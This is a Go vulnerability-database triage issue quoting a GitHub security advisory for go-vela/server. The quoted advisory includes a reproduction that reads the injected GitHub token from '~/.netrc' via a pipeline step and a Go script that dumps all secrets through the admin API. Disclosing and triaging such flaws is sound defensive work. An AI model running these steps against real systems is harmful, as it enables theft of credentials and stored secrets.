x/vulndb: potential Go vuln in github.com/go-vela/server/api: GHSA-8j3f-mhq8-gmh4

[GoVulnBot]

In GitHub Security Advisory GHSA-8j3f-mhq8-gmh4, there is a vulnerability in the following Go packages or modules:

Unit	Fixed	Vulnerable Ranges
github.com/go-vela/server/api	0.7.5	>= 0.7.0, < 0.7.5

Cross references:

• CVE-2021-21432 appears in issue x/vulndb: potential Go vuln in github.com/go-vela/server/api: GHSA-8j3f-mhq8-gmh4 #812 NOT_IMPORTABLE
• GHSA-8j3f-mhq8-gmh4 appears in issue x/vulndb: potential Go vuln in github.com/go-vela/server/api: GHSA-8j3f-mhq8-gmh4 #812 NOT_IMPORTABLE

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: github.com/go-vela/server/api
    versions:
      - introduced: 0.7.0
        fixed: 0.7.5
    packages:
      - package: github.com/go-vela/server/api
  - module: github.com/go-vela/server/api
    versions:
      - introduced: 0.7.0
        fixed: 0.7.5
    packages:
      - package: github.com/go-vela/server
description: "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThe
    additional auth mechanism added within https://github.com/go-vela/server/pull/246
    enables some malicious user to obtain secrets utilizing the injected credentials
    within the `~/.netrc` file. Steps to reproduce\n\n1. Create Vela server\n2. Login
    to Vela UI\n3. Promote yourself to Vela administrator \n    - `UPDATE users SET
    admin = 't' WHERE name = <username>`\n4. Activate repository within Vela\n5. Add
    `.vela.yml` to the repository with the following content\n\n    \n    ```yaml\n
    \   version: \"1\"\n    \n    steps:\n    - name: steal\n      image: alpine\n
    \     commands:\n        - cat ~/.netrc\n    ```\n\n1. Look at build logs to find
    the following content\n\n    ```\n    $ cat ~/.netrc\n    machine <GITHUB URL>\n
    \   login x-oauth-basic\n    password <token>\n    ```\n\n1. Copy the password
    to be utilized in some later step\n1. Add secret(s) to activated repo\n1. Copy
    the following script into `main.go`\n\n    ```golang\n    package main\n    \n
    \   import (\n\t    \"fmt\"\n\t    \"github.com/go-vela/sdk-go/vela\"\n\t    \"os\"\n
    \   )\n    \n    func main() {\n\t    // create client to connect to vela\n\t
    \   client, err := vela.NewClient(os.Getenv(\"VELA_SERVER_ADDR\"), \"vela\", nil)\n\t
    \   if err != nil {\n\t\t    panic(err)\n\t    }\n    \n\t    // add PAT to request\n\t
    \   client.Authentication.SetPersonalAccessTokenAuth(os.Getenv(\"VELA_TOKEN\"))\n
    \   \n    \n\t    secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})\n\t
    \   if err != nil {\n\t\t    panic(err)\n\t    }\n    \n\t    for _, secret :=
    range *secrets {\n\t\t    fmt.Println(*secret.Name)\n\t\t    fmt.Println(*secret.Value)\n\t
    \   }\n    }\n    ```\n\n1. Run the `main.go` with environment specific settings\n
    \  - `VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously>
    go run main.go`\n\nThe previously posted script could be updated to utilize any
    API endpoint(s) the activated user has access against.\n\n### Patches\n_Has the
    problem been patched? What versions should users upgrade to?_\n\n* Upgrade to
    `v0.7.5` or later\n\n### Workarounds\n_Is there a way for users to fix or remediate
    the vulnerability without upgrading?_\n\n* No known workarounds\n\n### References\n_Are
    there any links users can visit to find out more?_\n\n* https://github.com/go-vela/server/pull/246\n*
    https://docs.github.com/en/enterprise-server@3.0/rest/reference/apps#check-a-token\n\n###
    For more information\nIf you have any questions or comments about this advisory\n\n*
    Email us at [vela@target.com](mailto:vela@target.com)"
cves:
  - CVE-2021-21432
ghsas:
  - GHSA-8j3f-mhq8-gmh4

[tatianab]

Duplicate of #812